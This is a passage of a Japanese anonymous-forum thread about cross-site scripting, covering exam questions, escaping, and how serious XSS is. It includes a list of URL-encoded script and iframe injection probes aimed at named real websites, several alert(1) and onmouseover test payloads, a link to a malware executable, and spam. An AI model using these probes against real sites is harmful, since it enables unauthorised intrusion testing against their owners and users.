クロスサイトスクリプティング

このエントリーをはてなブックマークに追加
92名無しさん@お腹いっぱい。:03/10/18 13:04
>>86
http://www.crowechizek.com/CC/Global+Navigation/Services/r05_ovr.htm?Serv="><s>
93名無しさん@お腹いっぱい。:03/10/19 18:40
今日の情報セキュリティ試験でXSSが出て来た…
94名無しさん@お腹いっぱい。:03/10/19 22:37
>>93
Webブラウザからのリクエストに対してWebサーバが返すWebコンテンツ中に
[ b ]が存在した場合には,それらに対するエスケープ処理をWebサーバが
実施しなければならないといったことがあります。

bに相当するのは普通「スクリプト」だと思うんだが、解答群に無かったよな。
95名無しさん@お腹いっぱい。:03/10/19 23:44
>>94
メタキャラクタでいいんじゃない?
要は不等号をタグとして扱わなければいい訳だし。
9695:03/10/20 07:16
>>95
うん。漏れもメタキャラクタにしたんだけどXSS対策に限定すると
何か回答としてはイマイチだなぁと。
97名無しさん@お腹いっぱい。:03/10/27 21:29
総務省お抱えのcrowechizekはFlash,HTML両バージョンともダメダメ。
Flashでは応答返ってこないし、HTMLでは文字大きくなるし。
"<H1>No medicine can cure a fool</H1>
98名無しさん@お腹いっぱい。:03/10/28 22:43
↑IIS?
99名無しさん@お腹いっぱい。:03/10/30 10:56
> Webブラウザからのリクエストに対してWebサーバが返すWebコンテンツ中に

リクエストに対して返すコンテンツ中のメタキャラクタを全部エスケープしち
まったら、HTMLが全部ソースで見えちまうだろ。大丈夫か、その試験。
100名無しさん@お腹いっぱい。:03/10/30 11:00
>>94
スクリプト を エスケープする とは言わない。
エスケープする対象として日本語的に適切な選択肢を選べば回答できる。

他にはどんな選択肢があったの?
101名無しさん@お腹いっぱい。:04/01/07 12:29
最近話題にもならなくなったな
102名無しさん@お腹いっぱい。:04/02/04 00:16
クッキーで個人情報を保存するのはどう?
↓使ってみようかと思ってますが大丈夫でしょうか
ttp://resume.meieki.com/
103名無しさん@お腹いっぱい。:04/02/04 00:32
URLにスクリプト仕込むのはTHEBBSの人たちが既にやってる
http://hack.dot.thebbs.jp/1068805016.html
JavascriptをいったんString.fromCharCode化してしまえば
全タグ有効っつーかなんでもできるらしい
104名無しさん@お腹いっぱい。:04/04/11 21:36
ぱおぱおクッキー
105名無しさん@お腹いっぱい。:04/04/11 23:30
2chにもクロスサイトスクリプティング脆弱性は結構あるよ。
106名無しさん@お腹いっぱい。:04/04/12 08:53
言うだけなら誰でも出来る罠
107名無しさん@お腹いっぱい。:04/04/12 11:29
>>106
実際にやるとどこかのおバカさんみたいに
ムショに連行される罠w
108名無しさん@お腹いっぱい。:04/04/12 13:29
と言い訳をして具体例も挙げられない馬鹿もいるようで。
109名無しさん@お腹いっぱい。:04/05/09 23:56
>>107
俺はハッカーだから鯖落としたりできるぜ! でも捕まるからやらない

ってな。捕まらないようにできない奴は単なる厨房
足跡ベタベタ残してならF5押してる馬鹿と同じ
110名無しさん@お腹いっぱい。:04/08/08 21:34
最近落ち着いた?
111名無しさん@お腹いっぱい。:04/09/16 16:51:06
みたいだね
112名無しさん@お腹いっぱい。:04/10/18 10:27:10
懐かしいね
113名無しさん@お腹いっぱい。:04/11/19 17:45:06
想定される被害で考えたらXSSは「だからなに?」って程度のもんだよ。
Phishingに使われちゃうとかだろうな、今だと。
あとあれか、「XSSほっといてるってコトは他にも穴がバンバンあるだろうーな」
「この会社はセキュリティ対策してねーな」って思われちゃう位だろうか。
114名無しさん@お腹いっぱい。:05/01/02 11:52:43

115名無しさん@お腹いっぱい。:2005/05/19(木) 16:29:50
質問させてください。
クロスサイトスクリプティングに関して、概要や対策を紹介したページは多々あるんですが、
実際自分のWEBサイトが攻撃の踏み台にされたかどうかの確認する方法ってあるんでしょうか?
つまりWEBサイト上に形跡が残るものかどうかということを知りたいです。
116名無しさん@お腹いっぱい。:2005/07/08(金) 16:40:25
あっそ
117名無しさん@お腹いっぱい。:2005/07/24(日) 15:08:01
ネクラヒッキーのみんなー
夏は出会いの季節!夏を盛り上げる為にも、ココで女の子と出会って仲良くなろう♪
http://www.pretty-love.com/de.php

118名無しさん@お腹いっぱい。:2005/08/03(水) 00:00:59
●..●...●●...●●●●...●●.....●.●●.●..●.●●●....●●●...●.●.●●

ウイルス対策ソフトの検出力結果
http://www.geocities.jp/stealrush/security.html

●●..●..●●.●●....●.●●.●.●●●●●..●.●●●...●..●●.●....●●
119名無しさん@お腹いっぱい。:2006/06/03(土) 15:48:50
先日、中国人らしいハッカーにVNCの脆弱性をりようされ
PCに進入を許してしまいました。
これは、ハッカーがIEの履歴に残していったEXEなんですが
http://mysky.6600.org/yx/gz.exe
偉い方、なにをするものか教えてください
120名無しさん@お腹いっぱい。:2007/04/05(木) 16:35:01
ttp://hyocom.jp/b_search.php
ここのキーワード検索は、XSSなんでしょうか?
121名無しさん@お腹いっぱい。:2007/11/04(日) 11:30:26
ttp://www.brooks.co.jp/index.php

ヤバイなこのサイト・・・
122名無しさん@お腹いっぱい。:2008/06/03(火) 21:25:27
>>119
メール送信ワームが作成する圧縮ユーティリティ
ワームが自分自身を圧縮してKellyOsbourne.com.gzという
ファイルを作るためのもの。
早い話がワームがすでに実行されたことを意味するよ。
123名無しさん@お腹いっぱい。:2008/06/05(木) 00:12:08
2年物の自演てすごいよな
124名無しさん@お腹いっぱい。:2009/04/05(日) 21:36:40

ttp://poke.ula.cc/pcview.cgi/%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
ttp://h.ula.cc/dance/?kenken=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
ttp://same.ula.cc/test/r.so/%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
ttp://unkar.jp/2ch/search.php?q=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3C%2Fscript%3E
ttp://mail-cafe.tv/p/top/index2.php?c=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://idol.mp3torrent.org/%22%3E%3Ciframe%20src=/%3E%3C/iframe%3E/index.html
ttp://www.nikkanberita.com/search.cgi?w=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

ttp://sousuo.gov.cn/pagephoto?photopage=cn%2Fphoto.jsp&channelid=3001&searchword=YouTube&url=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://sbj.saic.gov.cn/english/show.asp?id=460&bm=%27%3E%3Ciframe%3E
ttp://www.stats.gov.cn/was40/reldetail.jsp?docid=%22%3E%3Ciframe%3E%3C/iframe%3E

ttp://japanese.joins.com/search/japanese.php?query=kim%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://world.kbs.co.kr/english/news/news_Po_detail.htm?No=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://joongangdaily.joins.com/search/index.html?query=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://chinese.joins.com/gb/series.do?method=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://chinese.joins.com/big5/article.do?method=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://photo.english.chosun.com/dailyNews/view.do?category=2&gubun=ENG?gubun=daily_news_item&idx=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://news.chosun.com/svc/list_in/list.html?catid=%22%3E%3Ciframe%3E%3C/iframe%3E
125名無しさん@お腹いっぱい。:2009/06/12(金) 03:34:55
http://pc11.2ch.net/test/read.cgi/sec/1004160822/l50
126名無しさん@お腹いっぱい。:2009/06/12(金) 03:35:14
http://pc11.2ch.net/test/read.cgi/sec/1004160822/l50
127名無しさん@お腹いっぱい。:2010/09/05(日) 10:10:20
うーん
128ひみつの検疫さん:2024/05/03(金) 08:45:39 ID:MarkedRes
汚染を除去しました。
129 忍法帖【Lv=40,xxxPT】(5+0:8) 【29.4m】 電脳プリオン ◆3YKmpu7JR7Ic :2013/01/09(水) 22:34:04.13 BE:304056656-PLT(12079)
  ∧_∧
  ( ・∀・)   | | ガッ
 と    )    | |
   Y /ノ    人
    / )    <  >__Λ∩
  _/し' //. V`Д´)/ ←>>81
 (_フ彡        /
130 忍法帖【Lv=3,xxxP】(1+0:8) :2013/01/11(金) 02:49:36.70
test
131名無しさん@お腹いっぱい。:2013/01/24(木) 21:26:51.65
過疎スレがこんなところにも。
132名無しさん@お腹いっぱい。:2013/02/09(土) 00:06:11.18
タグを使えないネトゲのマイページのプロフィール欄に
外部のブログパーツのスクリプトを引っ張ってきたいのですが、
どのようにやればいいのでしょうか。
ご教示いただけますか?

ほかの人のやっているののソースを見ると、
アンカーが二重<<>>になっているだけのようなのですが
それで書き込んでもはじかれてしまいます。

しらべてみて、文字コードによるハック?ということまでたどりついたのですが
実際のやり方がわかりません。

詳しい方おしえてください。よろしくお願いします。
133名無しさん@お腹いっぱい。:2013/10/19(土) 22:46:39.70
<script>alert(1);</script>
<script>alert("a");</script>
>>javascript:alert(1)
134名無しさん@お腹いっぱい。:2013/10/19(土) 22:47:43.23
>>1javascript:alert(1)
135名無しさん@お腹いっぱい。:2013/10/19(土) 22:49:48.21
>>000
136名無しさん@お腹いっぱい。:2013/10/19(土) 22:55:12.82
onmouseover='alert(1)'
137名無しさん@お腹いっぱい。:2013/10/19(土) 22:56:16.74
onmouseover=alert(1)//
138名無しさん@お腹いっぱい。:2013/10/20(日) 06:48:52.86
" onmouseover="alert(1)
139名無しさん@お腹いっぱい。:2013/12/22(日) 01:29:23.82
test
<iframe style='display:none'><script>alert(1)</script></iframe>
140javascript:alert(8):2014/07/19(土) 22:32:41.10
'>"><hr>
141名無しさん@お腹いっぱい。
そりゃそうだ